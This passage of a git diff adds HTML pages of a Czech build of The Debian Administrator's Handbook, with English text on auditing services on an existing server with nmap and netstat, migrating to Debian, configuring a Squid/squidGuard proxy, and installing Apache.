+              id="id-1.6.5.4.4.2"
+              class="indexterm"></a><div
+              class="para">
+					The <code
+                class="command">nmap</code> tool (in the package with the same name) will quickly identify Internet services hosted by a network connected machine without even requiring to log in to it. Simply call the following command on another machine connected to the same network:
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>nmap mirwiz</code></strong>
+<code
+                class="computeroutput">Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-06 14:41 CEST
+Nmap scan report for mirwiz (192.168.1.104)
+Host is up (0.00062s latency).
+Not shown: 992 closed ports
+PORT     STATE SERVICE
+22/tcp   open  ssh
+25/tcp   open  smtp
+80/tcp   open  http
+111/tcp  open  rpcbind
+139/tcp  open  netbios-ssn
+445/tcp  open  microsoft-ds
+5666/tcp open  nrpe
+9999/tcp open  abyss
+
+Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds</code></pre><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>ALTERNATIVE</em></span> Use <code
+                          class="command">netstat</code> to find the list of available services</strong></p></div></div></div><div
+                class="para">
+					On a Linux machine, the <code
+                  class="command">netstat -tupan</code> command will show the list of active or pending TCP sessions, as well UDP ports on which running programs are listening. This facilitates identification of services offered on the network.
+				</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> IPv6</strong></p></div></div></div><div
+                class="para">
+					Some network commands may work either with IPv4 (the default usually) or with IPv6. These include the <code
+                  class="command">nmap</code> and <code
+                  class="command">netstat</code> commands, but also others, such as <code
+                  class="command">route</code> or <code
+                  class="command">ip</code>. The convention is that this behavior is enabled by the <em
+                  class="parameter"><code>-6</code></em> command-line option.
+				</div></div><div
+              class="para">
+					If the server is a Unix machine offering shell accounts to users, it is interesting to determine if processes are executed in the background in the absence of their owner. The command <code
+                class="command">ps auxw</code> displays a list of all processes with their user identity. By checking this information against the output of the <code
+                class="command">who</code> command, which gives a list of logged in users, it is possible to identify rogue or undeclared servers or programs running in the background. Looking at <code
+                class="filename">crontabs</code> (tables listing automatic actions scheduled by users) will often provide interesting information on functions fulfilled by the server (a complete explanation of <code
+                class="command">cron</code> is available in <a
+                class="xref"
+                href="sect.task-scheduling-cron-atd.html">9.7 – „Scheduling Tasks with <code
+                  class="command">cron</code> and <code
+                  class="command">atd</code>“</a>).
+				</div><div
+              class="para">
+					In any case, it is essential to backup your servers: this allows recovery of information after the fact, when users will report specific problems due to the migration.
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.6.5.5"></a>3.2.2. Backing up the Configuration</h3></div></div></div><div
+            class="para">
+				It is wise to retain the configuration of every identified service in order to be able to install the equivalent on the updated server. The bare minimum is to make a backup copy of the configuration files.
+			</div><div
+            class="para">
+				For Unix machines, the configuration files are usually found in <code
+              class="filename">/etc/</code>, but they may be located in a sub-directory of <code
+              class="filename">/usr/local/</code>. This is the case if a program has been installed from sources, rather than with a package. In some cases, one may also find them under <code
+              class="filename">/opt/</code>.
+			</div><div
+            class="para">
+				For data managing services (such as databases), it is strongly recommended to export the data to a standard format that will be easily imported by the new software. Such a format is usually in text mode and documented; it may be, for example, an SQL dump for a database, or an LDIF file for an LDAP server.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.6.5.5.5"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/existing-setup-2.png"
+                  alt="Database backups" /></div></div><p
+              class="title"><strong>Obrázek 3.2. Database backups</strong></p></div><div
+            class="para">
+				Each server software is different, and it is impossible to describe all existing cases in detail. Compare the documentation for the existing and the new software to identify the exportable (thus, re-importable) portions and those which will require manual handling. Reading this book will clarify the configuration of the main Linux server programs.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.6.5.6"></a>3.2.3. Taking Over an Existing Debian Server</h3></div></div></div><a
+            id="id-1.6.5.6.2"
+            class="indexterm"></a><a
+            id="id-1.6.5.6.3"
+            class="indexterm"></a><a
+            id="id-1.6.5.6.4"
+            class="indexterm"></a><div
+            class="para">
+				To effectively take over its maintenance, one may analyze a machine already running with Debian.
+			</div><div
+            class="para">
+				The first file to check is <code
+              class="filename">/etc/debian_version</code>, which usually contains the version number for the installed Debian system (it is part of the <span
+              class="emphasis"><em>base-files</em></span> package). If it indicates <code
+              class="literal"><em
+                class="replaceable">codename</em>/sid</code>, it means that the system was updated with packages coming from one of the development distributions (either testing or unstable).
+			</div><div
+            class="para">
+				The <code
+              class="command">apt-show-versions</code> program (from the Debian package of the same name) checks the list of installed packages and identifies the available versions. <code
+              class="command">aptitude</code> can also be used for these tasks, albeit in a less systematic manner.
+			</div><div
+            class="para">
+				A glance at the <code
+              class="filename">/etc/apt/sources.list</code> file (and <code
+              class="filename">/etc/apt/sources.list.d/</code> directory) will show where the installed Debian packages likely came from. If many unknown sources appear, the administrator may choose to completely reinstall the computer's system to ensure optimal compatibility with the software provided by Debian.
+			</div><div
+            class="para">
+				The <code
+              class="filename">sources.list</code> file is often a good indicator: the majority of administrators keep, at least in comments, the list of APT sources that were previously used. But you should not forget that sources used in the past might have been deleted, and that some random packages grabbed on the Internet might have been manually installed (with the <code
+              class="command">dpkg</code> command). In this case, the machine is misleading in its appearance of “standard” Debian. This is why you should pay attention to any indication that will give away the presence of external packages (appearance of <code
+              class="filename">deb</code> files in unusual directories, package version numbers with a special suffix indicating that it originated from outside the Debian project, such as <code
+              class="literal">ubuntu</code> or <code
+              class="literal">lmde</code>, etc.)
+			</div><div
+            class="para">
+				Likewise, it is interesting to analyze the contents of the <code
+              class="filename">/usr/local/</code> directory, whose purpose is to contain programs compiled and installed manually. Listing software installed in this manner is instructive, since this raises questions on the reasons for not using the corresponding Debian package, if such a package exists.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>QUICK LOOK</em></span> <span
+                        class="pkg pkg">cruft</span></strong></p></div></div></div><div
+              class="para">
+				The <span
+                class="pkg pkg">cruft</span> package proposes to list the available files that are not owned by any package. It has some filters (more or less effective, and more or less up to date) to avoid reporting some legitimate files (files generated by Debian packages, or generated configuration files not managed by <code
+                class="command">dpkg</code>, etc.).
+			</div><div
+              class="para">
+				Be careful to not blindly delete everything that <code
+                class="command">cruft</code> might list!
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.6.5.7"></a>3.2.4. Installing Debian</h3></div></div></div><div
+            class="para">
+				Once all the required information on the current server is known, we can shut it down and begin to install Debian on it.
+			</div><a
+            id="id-1.6.5.7.3"
+            class="indexterm"></a><div
+            class="para">
+				To choose the appropriate version, we must know the computer's architecture. If it is a reasonably recent PC, it is most likely to be amd64 (older PCs were usually i386). In other cases, we can narrow down the possibilities according to the previously used system.
+			</div><div
+            class="para">
+				<a
+              class="xref"
+              href="sect.how-to-migrate.html#tab-corresp">3.1</a> is not intended to be exhaustive, but may be helpful. In any case, the original documentation for the computer is the most reliable source to find this information.
+			</div><div
+            class="table"><a
+              xmlns=""
+              id="tab-corresp"></a><p
+              class="title"><strong>Tabulka 3.1. Matching operating system and architecture</strong></p><div
+              class="table-contents"><table
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="lt-4-cols gt-7-rows"
+                summary="Matching operating system and architecture"><colgroup><col /><col /></colgroup><thead><tr><th>Operating System</th><th>Architecture(s)</th></tr></thead><tbody><tr><td>DEC Unix (OSF/1)</td><td>alpha, mipsel</td></tr><tr><td>HP Unix</td><td>ia64, hppa</td></tr><tr><td>IBM AIX</td><td>powerpc</td></tr><tr><td>Irix</td><td>mips</td></tr><tr><td>OS X</td><td>amd64, powerpc, i386</td></tr><tr><td>z/OS, MVS</td><td>s390x, s390</td></tr><tr><td>Solaris, SunOS</td><td>sparc, i386, m68k</td></tr><tr><td>Ultrix</td><td>mips</td></tr><tr><td>VMS</td><td>alpha</td></tr><tr><td>Windows 95/98/ME</td><td>i386</td></tr><tr><td>Windows NT/2000</td><td>i386, alpha, ia64, mipsel</td></tr><tr><td>Windows XP / Windows Server 2008</td><td>i386, amd64, ia64</td></tr><tr><td>Windows RT</td><td>armel, armhf, arm64</td></tr><tr><td>Windows Vista / Windows 7-8-10</td><td>i386, amd64</td></tr></tbody></table></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>HARDWARE</em></span> 64 bit PC vs 32 bit PC</strong></p></div></div></div><a
+              id="id-1.6.5.7.7.2"
+              class="indexterm"></a><a
+              id="id-1.6.5.7.7.3"
+              class="indexterm"></a><div
+              class="para">
+				Most recent computers have 64 bit Intel or AMD processors, compatible with older 32 bit processors; the software compiled for “i386” architecture thus works. On the other hand, this compatibility mode does not fully exploit the capabilities of these new processors. This is why Debian provides the “amd64” architecture, which works for recent AMD chips as well as Intel “em64t” processors (including most of the Core series), which are very similar to AMD64.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.6.5.8"></a>3.2.5. Installing and Configuring the Selected Services</h3></div></div></div><div
+            class="para">
+				Once Debian is installed, we must install and configure one by one all of the services that this computer must host. The new configuration must take into consideration the prior one in order to ensure a smooth transition. All the information collected in the first two steps will be useful to successfully complete this part.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.6.5.8.3"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/existing-setup-4.png"
+                  alt="Install the selected services" /></div></div><p
+              class="title"><strong>Obrázek 3.3. Install the selected services</strong></p></div><div
+            class="para">
+				Prior to jumping into this exercise with both feet, it is strongly recommended that you read the remainder of this book. After that you will have a more precise understanding of how to configure the expected services.
+			</div><div
+            class="para">
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="existing-setup.html"><strong>Předcházející</strong>Kapitola 3. Analyzing the Existing Setup and Migr...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="installation.html"><strong>Další</strong>Kapitola 4. Installation</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.http-ftp-proxy.html b/tmp/cs-CZ/html/sect.http-ftp-proxy.html
new file mode 100644
index 000000000..48a2abb17
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.http-ftp-proxy.html
@@ -0,0 +1,201 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">11.6. HTTP/FTP Proxy</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="prev"
+        href="sect.windows-file-server-with-samba.html"
+        title="11.5. Setting Up Windows Shares with Samba" /><link
+        rel="next"
+        href="sect.ldap-directory.html"
+        title="11.7. LDAP Directory" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.http-ftp-proxy.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.windows-file-server-with-samba.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ldap-directory.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.http-ftp-proxy"></a>11.6. HTTP/FTP Proxy</h2></div></div></div><div
+          class="para">
+			An HTTP/FTP proxy acts as an intermediary for HTTP and/or FTP connections. Its role is twofold:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					Caching: recently downloaded documents are copied locally, which avoids multiple downloads.
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					Filtering server: if use of the proxy is mandated (and outgoing connections are blocked unless they go through the proxy), then the proxy can determine whether or not the request is to be granted.
+				</div></li></ul></div><a
+          id="id-1.14.9.4"
+          class="indexterm"></a><a
+          id="id-1.14.9.5"
+          class="indexterm"></a><div
+          class="para">
+			Falcot Corp selected Squid as their proxy server.
+		</div><a
+          id="id-1.14.9.7"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.9.8"></a>11.6.1. Installing</h3></div></div></div><div
+            class="para">
+				The <span
+              class="pkg pkg">squid3</span> Debian package only contains the modular (caching) proxy. Turning it into a filtering server requires installing the additional <span
+              class="pkg pkg">squidguard</span> package. In addition, <span
+              class="pkg pkg">squid-cgi</span> provides a querying and administration interface for a Squid proxy.
+			</div><div
+            class="para">
+				Prior to installing, care should be taken to check that the system can identify its own complete name: the <code
+              class="command">hostname -f</code> must return a fully-qualified name (including a domain). If it does not, then the <code
+              class="filename">/etc/hosts</code> file should be edited to contain the full name of the system (for instance, <code
+              class="literal">arrakis.falcot.com</code>). The official computer name should be validated with the network administrator in order to avoid potential name conflicts.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.9.9"></a>11.6.2. Configuring a Cache</h3></div></div></div><div
+            class="para">
+				Enabling the caching server feature is a simple matter of editing the <code
+              class="filename">/etc/squid3/squid.conf</code> configuration file and allowing machines from the local network to run queries through the proxy. The following example shows the modifications made by the Falcot Corp administrators:
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.14.9.9.3"></a><p
+              class="title"><strong>Příklad 11.25. The <code
+                  class="filename">/etc/squid3/squid.conf</code> file (excerpts)</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+# INSERT YOUR OWN RULE(S) HERE TO ALLOW ACCESS FROM YOUR CLIENTS
+
+# Example rule allowing access from your local networks. Adapt
+# to list your (internal) IP networks from where browsing should
+# be allowed
+acl our_networks src 192.168.1.0/24 192.168.2.0/24
+http_access allow our_networks
+http_access allow localhost
+# And finally deny all other access to this proxy
+http_access deny all
+</pre></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.9.10"></a>11.6.3. Configuring a Filter</h3></div></div></div><div
+            class="para">
+				<code
+              class="command">squid</code> itself does not perform the filtering; this action is delegated to <code
+              class="command">squidGuard</code>. The former must then be configured to interact with the latter. This involves adding the following directive to the <code
+              class="filename">/etc/squid3/squid.conf</code> file:
+			</div><a
+            id="id-1.14.9.10.3"
+            class="indexterm"></a><pre
+            class="programlisting">
+url_rewrite_program /usr/bin/squidGuard -c /etc/squid3/squidGuard.conf
+</pre><div
+            class="para">
+				The <code
+              class="filename">/usr/lib/cgi-bin/squidGuard.cgi</code> CGI program also needs to be installed, using <code
+              class="filename">/usr/share/doc/squidguard/examples/squidGuard.cgi.gz</code> as a starting point. Required modifications to this script are the <code
+              class="varname">$proxy</code> and <code
+              class="varname">$proxymaster</code> variables (the name of the proxy and the administrator's contact e-mail, respectively). The <code
+              class="varname">$image</code> and <code
+              class="varname">$redirect</code> variables should point to existing images representing the rejection of a query.
+			</div><div
+            class="para">
+				The filter is enabled with the <code
+              class="command">service squid3 reload</code> command. However, since the <span
+              class="pkg pkg">squidguard</span> package does no filtering by default, it is the administrator's task to define the policy. This can be done by creating the <code
+              class="filename">/etc/squid3/squidGuard.conf</code> file (using <code
+              class="filename">/etc/squidguard/squidGuard.conf.default</code> as template if required).
+			</div><div
+            class="para">
+				The working database must be regenerated with <code
+              class="command">update-squidguard</code> after each change of the <code
+              class="command">squidGuard</code> configuration file (or one of the lists of domains or URLs it mentions). The configuration file syntax is documented on the following website: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.squidguard.org/Doc/configure.html">http://www.squidguard.org/Doc/configure.html</a></div>
+			</div><a
+            id="id-1.14.9.10.8"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ALTERNATIVE</em></span> DansGuardian</strong></p></div></div></div><a
+              id="id-1.14.9.10.9.2"
+              class="indexterm"></a><a
+              id="id-1.14.9.10.9.3"
+              class="indexterm"></a><div
+              class="para">
+				The <span
+                class="pkg pkg">dansguardian</span> package is an alternative to <span
+                class="emphasis"><em>squidguard</em></span>. This software does not simply handle a blacklist of forbidden URLs, but it can take advantage of the PICS system (<span
+                class="emphasis"><em>Platform for Internet Content Selection</em></span>) to decide whether a page is acceptable by dynamic analysis of its contents.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.windows-file-server-with-samba.html"><strong>Předcházející</strong>11.5. Setting Up Windows Shares with Samba</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ldap-directory.html"><strong>Další</strong>11.7. LDAP Directory</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.http-web-server.html b/tmp/cs-CZ/html/sect.http-web-server.html
new file mode 100644
index 000000000..07b0f5d5e
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.http-web-server.html
@@ -0,0 +1,683 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">11.2. Web Server (HTTP)</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="prev"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="next"
+        href="sect.ftp-file-server.html"
+        title="11.3. FTP File Server" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.http-web-server.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="network-services.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ftp-file-server.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.http-web-server"></a>11.2. Web Server (HTTP)</h2></div></div></div><div
+          class="para">
+			The Falcot Corp administrators decided to use the Apache HTTP server, included in Debian <span
+            class="distribution distribution">Jessie</span> at version 2.4.10.
+		</div><a
+          id="id-1.14.5.3"
+          class="indexterm"></a><a
+          id="id-1.14.5.4"
+          class="indexterm"></a><a
+          id="id-1.14.5.5"
+          class="indexterm"></a><a
+          id="id-1.14.5.6"
+          class="indexterm"></a><a
+          id="id-1.14.5.7"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> Other web servers</strong></p></div></div></div><div
+            class="para">
+			Apache is merely the most widely-known (and widely-used) web server, but there are others; they can offer better performance under certain workloads, but this has its counterpart in the smaller number of available features and modules. However, when the prospective web server is built to serve static files or to act as a proxy, the alternatives, such as <span
+              class="pkg pkg">nginx</span> and <span
+              class="pkg pkg">lighttpd</span>, are worth investigating.
+		</div><a
+            id="id-1.14.5.8.3"
+            class="indexterm"></a><a
+            id="id-1.14.5.8.4"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.5.9"></a>11.2.1. Installing Apache</h3></div></div></div><div
+            class="para">
+				Installing the <span
+              class="pkg pkg">apache2</span> package is all that is needed. It contains all the modules, including the <span
+              class="emphasis"><em>Multi-Processing Modules</em></span> (MPMs) that affect how Apache handles parallel processing of many requests (those used to be provided in separate <span
+              class="pkg pkg">apache2-mpm-*</span> packages). It will also pull <span
+              class="pkg pkg">apache2-utils</span> containing the command line utilities that we will discover later.
+			</div><div
+            class="para">
+				The MPM in use affects significantly the way Apache will handle concurrent requests. With the <span
+              class="emphasis"><em>worker</em></span> MPM, it uses <span
+              class="emphasis"><em>threads</em></span> (lightweight processes), whereas with the <span
+              class="emphasis"><em>prefork</em></span> MPM it uses a pool of processes created in advance. With the <span
+              class="emphasis"><em>event</em></span> MPM it also uses threads, but the inactive connections (notably those kept open by the HTTP <span
+              class="emphasis"><em>keep-alive</em></span> feature) are handed back to a dedicated management thread.
+			</div><div
+            class="para">
+				The Falcot administrators also install <span
+              class="pkg pkg">libapache2-mod-php5</span> so as to include the PHP support in Apache. This causes the default <span
+              class="emphasis"><em>event</em></span> MPM to be disabled, and <span
+              class="emphasis"><em>prefork</em></span> to be used instead, since PHP only works under that particular MPM.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SECURITY</em></span> Execution under the <code
+                        class="literal">www-data</code> user</strong></p></div></div></div><a
+              id="id-1.14.5.9.5.2"
+              class="indexterm"></a><a
+              id="id-1.14.5.9.5.3"
+              class="indexterm"></a><div
+              class="para">
+				By default, Apache handles incoming requests under the identity of the <code
+                class="literal">www-data</code> user. This means that a security vulnerability in a CGI script executed by Apache (for a dynamic page) won't compromise the whole system, but only the files owned by this particular user.
+			</div><div
+              class="para">
+				Using the <span
+                class="emphasis"><em>suexec</em></span> modules allows bypassing this rule so that some CGI scripts are executed under the identity of another user. This is configured with a <code
+                class="literal">SuexecUserGroup <em
+                  class="replaceable">user</em><em
+                  class="replaceable">group</em></code> directive in the Apache configuration.
+			</div><a
+              id="id-1.14.5.9.5.6"
+              class="indexterm"></a><div
+              class="para">
+				Another possibility is to use a dedicated MPM, such as the one provided by <span
+                class="pkg pkg">libapache2-mpm-itk</span>. This particular one has a slightly different behavior: it allows “isolating” virtual hosts (actually, sets of pages) so that they each run as a different user. A vulnerability in one website therefore cannot compromise files belonging to the owner of another website.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>QUICK LOOK</em></span> List of modules</strong></p></div></div></div><div
+              class="para">
+				The full list of Apache standard modules can be found online. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://httpd.apache.org/docs/2.4/mod/index.html">http://httpd.apache.org/docs/2.4/mod/index.html</a></div>
+			</div></div><div
+            class="para">
+				Apache is a modular server, and many features are implemented by external modules that the main program loads during its initialization. The default configuration only enables the most common modules, but enabling new modules is a simple matter of running <code
+              class="command">a2enmod <em
+                class="replaceable">module</em></code>; to disable a module, the command is <code
+              class="command">a2dismod <em
+                class="replaceable">module</em></code>. These programs actually only create (or delete) symbolic links in <code
+              class="filename">/etc/apache2/mods-enabled/</code>, pointing at the actual files (stored in <code
+              class="filename">/etc/apache2/mods-available/</code>).
+			</div><div
+            class="para">
+				With its default configuration, the web server listens on port 80 (as configured in <code
+              class="filename">/etc/apache2/ports.conf</code>), and serves pages from the <code
+              class="filename">/var/www/html/</code> directory (as configured in <code
+              class="filename">/etc/apache2/sites-enabled/000-default.conf</code>).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Adding support for SSL</strong></p></div></div></div><a
+              id="id-1.14.5.9.9.2"
+              class="indexterm"></a><a
+              id="id-1.14.5.9.9.3"
+              class="indexterm"></a><div
+              class="para">
+				Apache 2.4 includes the SSL module required for secure HTTP (HTTPS) out of the box. It just needs to be enabled with <code
+                class="command">a2enmod ssl</code>, then the required directives have to be added to the configuration files. A configuration example is provided in <code
+                class="filename">/etc/apache2/sites-available/default-ssl.conf</code>. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://httpd.apache.org/docs/2.4/mod/mod_ssl.html">http://httpd.apache.org/docs/2.4/mod/mod_ssl.html</a></div>
+			</div><div
+              class="para">
+				Some extra care must be taken if you want to favor SSL connections with <span
+                class="emphasis"><em>Perfect Forward Secrecy</em></span> (those connections use ephemeral session keys ensuring that a compromission of the server's secret key does not result in the compromission of old encrypted traffic that could have been stored while sniffing on the network). Have a look at Mozilla's recommandations in particular: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://wiki.mozilla.org/Security/Server_Side_TLS#Apache">https://wiki.mozilla.org/Security/Server_Side_TLS#Apache</a></div>
+			</div><a
+              id="id-1.14.5.9.9.6"
+              class="indexterm"></a></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.5.10"></a>11.2.2. Configuring Virtual Hosts</h3></div></div></div><div
+            class="para">
+				A virtual host is an extra identity for the web server.
+			</div><a
+            id="id-1.14.5.10.3"
+            class="indexterm"></a><div
+            class="para">
+				Apache considers two different kinds of virtual hosts: those that are based on the IP address (or the port), and those that rely on the domain name of the web server. The first method requires allocating a different IP address (or port) for each site, whereas the second one can work on a single IP address (and port), and the sites are differentiated by the hostname sent by the HTTP client (which only works in version 1.1 of the HTTP protocol — fortunately that version is old enough that all clients use it already).
+			</div><div
+            class="para">
+				The (increasing) scarcity of IPv4 addresses usually favors the second method; however, it is made more complex if the virtual hosts need to provide HTTPS too, since the SSL protocol hasn't always provided for name-based virtual hosting; the SNI extension (<span
+              class="emphasis"><em>Server Name Indication</em></span>) that allows such a combination is not handled by all browsers. When several HTTPS sites need to run on the same server, they will usually be differentiated either by running on a different port or on a different IP address (IPv6 can help there).
+			</div><div
+            class="para">
+				The default configuration for Apache 2 enables name-based virtual hosts. In addition, a default virtual host is defined in the <code
+              class="literal">/etc/apache2/sites-enabled/000-default.conf</code> file; this virtual host will be used if no host matching the request sent by the client is found.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> First virtual host</strong></p></div></div></div><div
+              class="para">
+				Requests concerning unknown virtual hosts will always be served by the first defined virtual host, which is why we defined <code
+                class="literal">www.falcot.com</code> first here.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>QUICK LOOK</em></span> Apache supports SNI</strong></p></div></div></div><a
+              id="id-1.14.5.10.8.2"
+              class="indexterm"></a><div
+              class="para">
+				The Apache server supports an SSL protocol extension called <span
